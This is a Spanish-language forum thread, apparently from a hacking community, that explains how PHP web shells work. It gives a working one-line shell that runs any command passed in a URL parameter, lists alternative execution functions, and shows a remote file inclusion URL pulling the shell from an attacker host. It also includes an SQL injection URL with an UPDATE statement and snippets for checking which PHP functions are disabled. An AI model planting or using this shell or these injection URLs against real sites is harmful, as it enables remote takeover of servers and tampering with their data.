Mensajes

Activeperl

editor: emacs y gedit

aver, si te fijas en los codigos de las shells.
te pongo un ejemplo:

Código (php) [Seleccionar] Expandir

<?php
$cmd=$_GET["cmd"];
system($cmd);
?>

la gente que no tiene ni la minima idea de php, usa las shells c99 y todas esas que te lo hacen casi todo automatico, pero no saben como funcionan.

$cmd es una variable global, con $_GET hacemos una peticion.
todo lo que pongamos despues del parametro cmd se ejecutara con system y nos mostrara el resultado del comando.

* ademas de ejecutar con system, se pueden ejecutar comandos con: passthru, system_exec, shell_exec, exec y con eval.

Ejemplo:
http://localhost/shell.php?cmd=ls%20-lia

Por eso cuando en un RFI:
http://vulnerable/principal/main.php?pag_dest=http://atacante/shell.txt?cmd=ls

saludos.

Un ejemplo:
http://localhost/noticia.asp?id_noticia=45+update+columna+set+tabla+='contenido'--

creo que te refieres a esto. 

lo oque puedes hacer es mirar el phpinfo creando una pagina en la que pongas esto

Código [Seleccionar] Expandir


<?
phpinfo();
?>


de ahi te sale toda la informacion de php con todas sus funciones y te dice si estan habilitadas o no

sip, se podria mirar hay pero da lata.
Aqui encontre esta que esta mejor

Código [Seleccionar] Expandir

if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}

saludos. 

bueno estaba viendo como mirar las funciones desavilitadas con php con esta funcion:

Código [Seleccionar] Expandir

$disable_funcions=@ini_get('disable_functions');
echo $disable_funcions;

pero no me anda bien.
Alguien sabe otra forma?